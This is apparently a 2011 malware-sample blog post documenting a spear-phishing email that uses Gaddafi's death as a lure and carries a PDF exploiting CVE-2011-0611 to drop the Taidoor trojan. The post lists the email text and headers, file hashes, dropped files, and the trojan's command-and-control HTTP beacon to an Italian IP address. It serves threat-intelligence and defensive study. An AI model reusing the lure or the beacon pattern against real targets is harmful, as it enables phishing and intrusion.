Clicky

Pages

Sunday, October 23, 2011

Oct 23 CVE-2011-0611 PDF 2011-10-23 Gaddafi death with Taidoor


I will post a few samples without analysis. This one is CVE-2011-0611 PDF with Taidoor Trojan exploiting Gaddafi's death with outgoing connection to 2.116.180.66 host66-180-static.116-2-b.business.telecomitalia.it








Common Vulnerabilities and Exposures (CVE)number

CVE-2011-0611 Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.

  General File Information

 File: ATT88422.pdf
Size: 249913
MD5:  1188EA8F0D086A8860A3AAFB54A3FA76

Download

Original Message


From: Mr.chl [mailto:Mr.chl@chumaps.chu.edu.tw]
Sent: Sunday, October 23, 2011 3:36 AM
To: xxxxxxxx
Subject: Fw:卡紮菲之死讓咱們更加百感交集

    卡紮菲被抓獲,卡紮菲受傷,卡紮菲死亡……20日,一條條從蘇爾特戰場傳出的消息,迅速傳到米蘇拉塔,傳到的黎波裏,傳到世界各地。有人歡呼,有人哀傷,更有人質疑消息的准確性……時隔數小時,利比亞“全國過渡委員會”執行委員會主席賈布裏勒在的黎波裏舉行新聞發布會,親口證實了統治利比亞42年之久的卡紮菲死亡的消息。早已躁動不安的的黎波裏頓時炸開了鍋。賈布裏勒說:“利比亞人民應該認識到,現在是塑造一個新利比亞的時候了,一個團結的.......

From: Mr.chl [mailto: Mr.chl @ chumaps.chu.edu.tw]
Sent: Sunday, October 23, 2011 3:36 AM
To: xxxxxxxx
Subject: Fw: Gaddafi's death so that we more mixed feelings

    Gaddafi was arrested, injured Gaddafi, Gaddafi of death ... 20, a battle of Sirte came from the news quickly spread to Misurata, reached Tripoli, reached the World the country. Some cheer, some sad, but some have questioned the accuracy of the message ... ... after a lapse of several hours, the Libyan "National Transitional Council," Executive Committee 席贾布里勒 held a press conference in Tripoli, Libya personally ............

Message Headers


Received: (qmail 2747 invoked from network); 23 Oct 2011 07:37:08 -0000
Received: from msr11.hinet.net (HELO msr11.hinet.net) (168.95.4.111)
  by xxxxxxxxxxxxxxx
Received: from deepin-f12c1fc0 (60-249-181-163.HINET-IP.hinet.net [60.249.181.163])
    by msr11.hinet.net (8.14.2/8.14.2) with SMTP id p9N7Zd5x021081
    for < xxxxxxxxxxx>; Sun, 23 Oct 2011 15:37:01 +0800 (CST)
Date: Sun, 23 Oct 2011 15:35:37 +0800
From: "Mr.chl" <Mr.chl@chumaps.chu.edu.tw>
To: "xxxxxxxxxxx
Reply-To: "mi.s8597" <mi.s8597@msa.hinet.net>
Subject: =?gb2312?B?Rnc6v6i8mbfG1q7LwNeM1NuCg7j8vNOw2bjQvbu8rw==?=
X-Priority: 3
X-GUID: DD855E25-0DA9-4004-88A5-7C652E9F02A9
X-Mailer: Foxmail 7.0.1.84[cn]
MIME-Version: 1.0
Message-ID: <201110231458564671317@chumaps.chu.edu.tw>
Content-Type: multipart/mixed;
    boundary="----=_001_NextPart622484256423_=----"

Sender

60.249.181.163
 -Hinet Address
Taiwan
CHTD, Chunghwa Telecom Co.,Ltd.
Data-Bldg.6F, No.21, Sec.21, Hsin-Yi Rd.
Taipei Taiwan 100



Automated Scans


VT is currently down but it is  CVE-2011-0611 with Taidoor


Created files


\Temp\11.pdf
\Local Settings\VSS.exe
File: VSS.exe
Size: 22016
MD5:  6E57520AFE21C8E3E32B0BC097E765E5



Traffic


GET /uxvdd.php?id=0263801911380616G0 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2.116.180.66
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Length: 15
Content-Type: application/octet-stream
Connection: Close


2.116.180.66
host66-180-static.116-2-b.business.telecomitalia.it
Host reachable, 152 ms. average
2.116.180.64 - 2.116.180.71
UNITESSILE S.P.A.
ROBERTO DORO
UNITESSILE S P A
VIA ROMA 15
33028 TOLMEZZO
Italy
phone: +394223277
fax: +39422327852




No comments:

Post a Comment